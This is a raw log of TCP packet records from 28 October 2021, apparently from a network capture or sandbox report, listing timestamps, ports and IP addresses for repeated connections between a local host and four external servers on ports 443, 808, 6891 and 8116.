Oct 28, 2021 05:27:51.319861889 CEST	49986	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:51.320457935 CEST	49986	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:51.320477009 CEST	443	49986	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:51.432084084 CEST	443	49985	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:51.433151007 CEST	49985	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:51.433823109 CEST	49985	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:51.433840036 CEST	443	49985	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:51.439477921 CEST	49985	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:51.439496040 CEST	443	49985	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:51.439594984 CEST	49985	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:51.439605951 CEST	443	49985	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:51.844001055 CEST	443	49986	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:51.845205069 CEST	49986	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:51.884052992 CEST	49986	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:51.884069920 CEST	443	49986	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:51.887430906 CEST	49986	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:51.887447119 CEST	443	49986	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:51.887505054 CEST	49986	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:51.887512922 CEST	443	49986	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:52.145241022 CEST	443	49985	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:52.145328045 CEST	443	49985	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:52.145354033 CEST	49985	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:52.145375967 CEST	49985	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:52.150886059 CEST	49985	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:52.150912046 CEST	443	49985	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:52.331659079 CEST	49987	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:52.501162052 CEST	808	49987	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:52.501343966 CEST	49987	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:52.501893997 CEST	49987	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:52.590775967 CEST	443	49986	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:52.590840101 CEST	443	49986	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:52.590977907 CEST	49986	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:52.590993881 CEST	49986	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:52.594526052 CEST	49986	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:52.594557047 CEST	443	49986	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:52.672543049 CEST	808	49987	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:52.672791958 CEST	808	49987	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:52.672900915 CEST	49987	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:52.673441887 CEST	49987	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:52.676992893 CEST	49987	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:52.677124977 CEST	49987	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:52.771419048 CEST	49988	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:52.843710899 CEST	808	49987	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:52.846330881 CEST	808	49987	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:52.846347094 CEST	808	49987	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:52.848036051 CEST	808	49987	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:52.929166079 CEST	808	49988	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:52.931236029 CEST	49988	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:53.232743025 CEST	808	49987	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:53.232772112 CEST	808	49987	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:53.232904911 CEST	49987	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:53.397195101 CEST	49988	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:53.416420937 CEST	49987	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:53.532686949 CEST	49989	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:53.555125952 CEST	808	49988	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:53.555193901 CEST	808	49988	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:53.555289030 CEST	49988	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:53.555751085 CEST	49988	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:53.558881044 CEST	49988	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:53.558981895 CEST	49988	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:53.586002111 CEST	808	49987	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:53.698837996 CEST	6891	49989	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:53.699013948 CEST	49989	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:53.699981928 CEST	49989	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:53.713481903 CEST	808	49988	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:53.716587067 CEST	808	49988	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:53.716617107 CEST	808	49988	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:53.716634035 CEST	808	49988	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:53.865849018 CEST	6891	49989	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:53.865920067 CEST	6891	49989	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:53.866084099 CEST	49989	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:53.866559982 CEST	49989	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:53.869415045 CEST	49989	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:53.869513988 CEST	49989	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:54.035517931 CEST	6891	49989	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:54.035538912 CEST	6891	49989	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:54.116734982 CEST	808	49988	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:54.116765022 CEST	808	49988	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:54.116959095 CEST	49988	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:54.424062967 CEST	6891	49989	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:54.424088955 CEST	6891	49989	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:54.424264908 CEST	49989	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:54.424319983 CEST	49989	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:55.034779072 CEST	49988	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:55.041548014 CEST	49989	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:55.175741911 CEST	49990	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:55.177964926 CEST	49991	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:55.192759991 CEST	808	49988	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:55.207581043 CEST	6891	49989	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:55.235703945 CEST	8116	49990	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:55.235780001 CEST	49990	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:55.236357927 CEST	49990	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:55.296154976 CEST	8116	49990	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:55.296359062 CEST	8116	49990	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:55.296406031 CEST	49990	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:55.297025919 CEST	49990	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:55.299830914 CEST	49990	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:55.299896002 CEST	49990	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:55.344078064 CEST	6891	49991	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:55.344198942 CEST	49991	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:55.347934961 CEST	49991	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:55.359626055 CEST	8116	49990	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:55.396918058 CEST	8116	49990	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:55.513972044 CEST	6891	49991	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:55.514064074 CEST	6891	49991	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:55.514132023 CEST	49991	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:55.514549017 CEST	49991	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:55.517265081 CEST	49991	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:55.517369986 CEST	49991	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:55.547462940 CEST	8116	49990	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:55.547492027 CEST	8116	49990	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:55.547596931 CEST	49990	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:55.547637939 CEST	49990	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:55.553442001 CEST	49990	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:55.613156080 CEST	8116	49990	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:55.673233032 CEST	49992	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:55.673274040 CEST	443	49992	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:55.673357010 CEST	49992	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:55.673927069 CEST	49992	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:55.673943043 CEST	443	49992	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:55.683238983 CEST	6891	49991	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:55.683255911 CEST	6891	49991	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:55.683269024 CEST	6891	49991	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:56.065049887 CEST	6891	49991	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:56.065170050 CEST	6891	49991	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:56.065248966 CEST	49991	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:56.065299988 CEST	49991	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:56.068335056 CEST	49991	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:56.177890062 CEST	443	49992	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:56.177963972 CEST	49992	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:56.178782940 CEST	49992	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:56.178795099 CEST	443	49992	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:56.192584038 CEST	49993	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:56.232624054 CEST	49992	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:56.232633114 CEST	443	49992	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:56.232765913 CEST	49992	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:56.232774973 CEST	443	49992	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:56.235631943 CEST	6891	49991	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:56.246517897 CEST	8116	49993	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:56.246680975 CEST	49993	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:56.247231960 CEST	49993	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:56.301668882 CEST	8116	49993	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:56.302005053 CEST	8116	49993	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:56.302357912 CEST	49993	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:56.303561926 CEST	49993	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:56.349417925 CEST	49993	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:56.349564075 CEST	49993	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:56.394534111 CEST	8116	49993	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:56.403264046 CEST	8116	49993	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:56.403419971 CEST	8116	49993	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:56.573832035 CEST	8116	49993	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:56.573854923 CEST	8116	49993	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:56.576261044 CEST	49993	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:56.576340914 CEST	49993	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:56.580154896 CEST	49993	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:56.633554935 CEST	8116	49993	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:56.730844021 CEST	49994	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:56.730914116 CEST	443	49994	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:56.731066942 CEST	49994	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:56.731852055 CEST	49994	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:56.731882095 CEST	443	49994	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:56.925673962 CEST	443	49992	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:56.925756931 CEST	443	49992	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:56.925898075 CEST	49992	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:56.925992966 CEST	49992	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:56.937803030 CEST	49992	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:56.937848091 CEST	443	49992	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:57.052088022 CEST	49995	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:57.212992907 CEST	808	49995	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:57.213128090 CEST	49995	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:57.213829994 CEST	49995	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:57.252262115 CEST	443	49994	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:57.252407074 CEST	49994	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:57.253386974 CEST	49994	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:57.253417015 CEST	443	49994	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:57.258502960 CEST	49994	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:57.258542061 CEST	443	49994	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:57.258645058 CEST	49994	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:57.258666992 CEST	443	49994	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:57.374599934 CEST	808	49995	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:57.374680996 CEST	808	49995	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:57.374799013 CEST	49995	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:57.375346899 CEST	49995	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:57.379201889 CEST	49995	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:57.379318953 CEST	49995	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:57.536084890 CEST	808	49995	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:57.541896105 CEST	808	49995	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:57.541913033 CEST	808	49995	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:57.541924000 CEST	808	49995	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:57.541939974 CEST	808	49995	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:57.933281898 CEST	808	49995	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:57.933304071 CEST	808	49995	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:57.933437109 CEST	49995	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:57.946494102 CEST	49995	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:57.963788986 CEST	443	49994	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:57.963931084 CEST	49994	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:57.963934898 CEST	443	49994	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:57.964004993 CEST	49994	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:57.968343019 CEST	49994	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:57.968377113 CEST	443	49994	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:58.067076921 CEST	50001	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:58.107502937 CEST	808	49995	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:58.129996061 CEST	50002	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:58.233311892 CEST	6891	50001	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:58.233434916 CEST	50001	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:58.234122992 CEST	50001	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:58.288234949 CEST	808	50002	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:58.288341999 CEST	50002	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:58.289560080 CEST	50002	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:58.400202036 CEST	6891	50001	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:58.400331974 CEST	6891	50001	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:58.400410891 CEST	50001	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:58.401180029 CEST	50001	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:58.406024933 CEST	50001	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:58.406106949 CEST	50001	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:58.447146893 CEST	808	50002	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:58.447175980 CEST	808	50002	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:58.447293043 CEST	50002	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:58.447921991 CEST	50002	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:58.453025103 CEST	50002	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:58.453182936 CEST	50002	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:58.572104931 CEST	6891	50001	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:58.572134972 CEST	6891	50001	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:58.605372906 CEST	808	50002	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:58.610582113 CEST	808	50002	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:58.610599995 CEST	808	50002	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:58.610621929 CEST	808	50002	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:58.610658884 CEST	808	50002	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:58.610672951 CEST	808	50002	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:58.611063004 CEST	6891	50001	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:58.958937883 CEST	6891	50001	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:58.958961964 CEST	6891	50001	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:58.959223032 CEST	50001	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:58.965007067 CEST	50001	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:59.000513077 CEST	808	50002	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:59.000535011 CEST	808	50002	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:59.000598907 CEST	50002	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:59.003611088 CEST	50002	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:59.081067085 CEST	50008	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:59.120851040 CEST	50009	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:59.130886078 CEST	6891	50001	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:59.133917093 CEST	8116	50008	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:59.134177923 CEST	50008	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:59.134727955 CEST	50008	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:59.161010027 CEST	808	50002	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:59.192712069 CEST	8116	50008	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:59.192734003 CEST	8116	50008	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:59.192879915 CEST	50008	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:59.193461895 CEST	50008	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:59.197594881 CEST	50008	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:59.197699070 CEST	50008	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:59.250247002 CEST	8116	50008	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:59.250278950 CEST	8116	50008	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:59.287146091 CEST	6891	50009	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:59.287329912 CEST	50009	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:59.288141966 CEST	50009	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:59.440835953 CEST	8116	50008	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:59.440886021 CEST	8116	50008	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:59.440989017 CEST	50008	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:59.449028015 CEST	50008	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:59.454164982 CEST	6891	50009	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:59.454224110 CEST	6891	50009	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:59.454361916 CEST	50009	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:59.455650091 CEST	50009	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:59.460516930 CEST	50009	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:59.460741043 CEST	50009	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:59.502469063 CEST	8116	50008	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:59.565576077 CEST	50011	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:59.565634966 CEST	443	50011	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:59.565749884 CEST	50011	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:59.566261053 CEST	50011	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:59.566288948 CEST	443	50011	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:59.626594067 CEST	6891	50009	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:59.626621008 CEST	6891	50009	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:59.626708984 CEST	6891	50009	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:00.014493942 CEST	6891	50009	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:00.014523983 CEST	6891	50009	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:00.014717102 CEST	50009	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:00.018851042 CEST	50009	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:28:00.088124990 CEST	443	50011	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:00.088335037 CEST	50011	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:00.088958979 CEST	50011	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:00.088969946 CEST	443	50011	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:00.092684984 CEST	50011	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:00.092705965 CEST	443	50011	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:00.092756987 CEST	50011	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:00.092768908 CEST	443	50011	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:00.147066116 CEST	50015	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:00.185847998 CEST	6891	50009	45.77.0.96	192.168.2.3
Oct 28, 2021 05:28:00.198774099 CEST	8116	50015	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:00.198887110 CEST	50015	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:00.199574947 CEST	50015	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:00.251804113 CEST	8116	50015	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:00.251879930 CEST	8116	50015	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:00.251970053 CEST	50015	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:00.252629042 CEST	50015	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:00.256699085 CEST	50015	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:00.256839037 CEST	50015	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:00.308413982 CEST	8116	50015	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:00.308433056 CEST	8116	50015	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:00.495723963 CEST	8116	50015	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:00.495739937 CEST	8116	50015	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:00.495796919 CEST	50015	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:00.495831013 CEST	50015	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:00.499140978 CEST	50015	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:28:00.551095963 CEST	8116	50015	185.56.219.47	192.168.2.3
Oct 28, 2021 05:28:00.627506971 CEST	50018	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:00.627553940 CEST	443	50018	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:00.627679110 CEST	50018	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:00.628357887 CEST	50018	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:00.628370047 CEST	443	50018	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:00.801464081 CEST	443	50011	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:00.801532030 CEST	443	50011	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:00.801630974 CEST	50011	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:00.801655054 CEST	50011	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:00.809112072 CEST	50011	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:00.809144020 CEST	443	50011	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:00.957165003 CEST	50020	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:01.115289927 CEST	808	50020	143.244.140.214	192.168.2.3
Oct 28, 2021 05:28:01.115463972 CEST	50020	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:01.120467901 CEST	50020	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:28:01.150268078 CEST	443	50018	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:01.150444031 CEST	50018	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:01.151209116 CEST	50018	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:01.151225090 CEST	443	50018	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:01.157068968 CEST	50018	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:01.157083988 CEST	443	50018	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:01.157241106 CEST	50018	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:28:01.157255888 CEST	443	50018	192.46.210.220	192.168.2.3
Oct 28, 2021 05:28:01.278718948 CEST	808	50020	143.244.140.214	192.168.2.3
